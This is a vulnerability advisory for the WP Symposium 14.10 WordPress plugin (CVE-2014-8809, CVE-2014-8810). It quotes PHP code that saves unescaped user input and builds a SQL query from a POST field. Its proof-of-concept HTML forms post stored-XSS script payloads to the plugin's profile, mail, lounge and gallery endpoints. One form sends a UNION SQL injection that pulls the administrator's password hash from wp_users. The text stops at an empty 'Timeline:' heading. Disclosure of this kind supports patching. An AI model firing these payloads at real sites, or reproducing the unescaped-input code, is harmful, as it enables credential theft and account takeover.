WP Symposium 14.10 Multiple XSS and SQL Injection

Homepage:

https://wordpress.org/plugins/wp-symposium/

CVE-ID

CVE-2014-8809

CVE-2014-8810

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

$_POST[‘text’] is not escaped.

File: wp-symposium\ajax\profile_functions.php

$uid = $_POST['uid'];
$text = $_POST['text'];
$parent = $_POST['parent'];

if (is_user_logged_in()) {

	if ( ($text != __(addslashes("Write a comment..."), "wp-symposium")) && ($text != '') ) {

		$wpdb->query( $wpdb->prepare( "
			INSERT INTO ".$wpdb->base_prefix."symposium_comments
			( 	subject_uid, 
				author_uid,
				comment_parent,
				comment_timestamp,
				comment,
				is_group
			)
			VALUES ( %d, %d, %d, %s, %s, %s )",
	        array(
	        	$uid,
	        	$current_user->ID,
	        	$parent,
	        	date("Y-m-d H:i:s"),
	        	$text,
	        	''
	        	)
	        ) );
}

$_POST[‘compose_text’] is not escaped.

File: wp-symposium\ajax\mail_functions.php

$subject = strip_tags($_POST['compose_subject']);
$message = $_POST['compose_text'];
$previous = $_POST['compose_previous'];
$message = $message.$previous;
// Send mail
if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_mail", array(
'mail_from' => $current_user->ID,
'mail_to' => $recipient->ID,
'mail_sent' => date("Y-m-d H:i:s"),
'mail_subject' => $subject,
'mail_message' => $message
 ) ) ) {
	$return = __('Message sent to', WPS_TEXT_DOMAIN).' '.$recipient->display_name;
 } else {
	$return = '<p><strong>'.__('There was a problem sending your mail to', WPS_TEXT_DOMAIN).' '.$recipient->display_name.'.</strong></p>';
 }

$_POST[‘comment’] is not escaped.

File: wp-symposium\ajax\lounge_functions.php

$comment = $_POST['comment'];

if ( ($comment != __(addslashes("Add a comment.."), "wp-symposium")) && ($comment != '') ) {

	$wpdb->query( $wpdb->prepare( "
		INSERT INTO ".$wpdb->base_prefix."symposium_lounge
		( 	author, 
			added,
			comment
		)
		VALUES ( %d, %s, %s )",
        array(
        	$current_user->ID,
        	date("Y-m-d H:i:s"),
        	$comment
        	)
    	) );
}

$_POST[‘name’] is not escaped.

File: wp-symposium\ajax\gallery_functions.php

$name = $_POST['name'];
$sub_album = $_POST['sub_album'];
if ($sub_album == 'true') {
	$parent = $_POST['parent'];
} else {
	$parent = 0;
}

// Create new album
$wpdb->query( $wpdb->prepare( "
INSERT INTO ".$wpdb->base_prefix."symposium_gallery
( 	parent_gid, 
	name,
	description, 
	owner, 
	sharing, 
	editing, 
	created, 
	updated, 
	is_group
)
VALUES ( %d, %s, %s, %d, %s, %s, %s, %s, %s )",
array(
	$parent,
	$name,
	'',
	$current_user->ID,
	'everyone',
	'nobody',
	date("Y-m-d H:i:s"),
	date("Y-m-d H:i:s"),
	''
	)
) );

$_POST[‘tray’] is not escaped.

File: wp-symposium\ajax\mail_functions.php

$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");

Proof of Concept:

You must be logged in except lounge and gallery XSS.

Profil page XSS visible:

http://wordpress-instalation/?page_id=%profile_page_id%&uid=%user_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
    <input type="hidden" name="action" value="addComment">
    <input type="hidden" name="parent" value="0"><br />
    XSS: <input type="text" name="text" value="&lt;script&gt;alert(String.fromCharCode(88,83,83,50));&lt;/script&gt;"><br />
    <input type="submit" value="Add profile comment">
</form>

then you must make your profile public:

<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
    <input type="hidden" name="action" value="updatePersonal">
    My User ID: <input type="text" name="uid"><br />
    <input type="hidden" name="wall_share" value="public">
    <input type="hidden" name="share" value="public">
    <input type="submit" value="Make profile public">
</form>

User mailbox XSS visible:

http://wordpress-instalation/?page_id=%mail_page_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
    <input type="hidden" name="action" value="sendMail">
    Recipent User ID: <input type="text" name="compose_recipient_id"><br />
    Title: <input type="text" name="compose_subject" value="My title"><br />
    XSS: <input type="text" name="compose_text" value="&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;"><br />
    <input type="submit" value="Send message to another user">
</form>

Lounge XSS visible:

http://wordpress-instalation/?page_id=%lounge_page_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/lounge_functions.php">
    <input type="hidden" name="action" value="add_comment">
    XSS: <input type="text" name="comment" value="&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;"><br />
    <input type="submit" value="Add lounge post">
</form>

Gallery XSS visible:

http://wordpress-instalation/?page_id=%gallery_page_id%&embed=on&album_id=%album_id%
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/gallery_functions.php">
    <input type="hidden" name="action" value="create_album">
    <input type="hidden" name="sub_album" value="false">
    XSS: <input type="text" name="name" value="&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;"><br />
    <input type="submit" value="Create gallery">
</form><br />

Message ID must be on of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id=”this_is_message_id” class=”mail_item mail_item_unread”)

<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
    <input type="hidden" name="action" value="getMailMessage">
    Message ID: <input type="text" name="mid"><br />
    SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- "><br />
    <input type="submit" value="Inject">
</form>

Returned value will be between “[split]YOUR_RETURNED_VALUE[split]”

Timeline: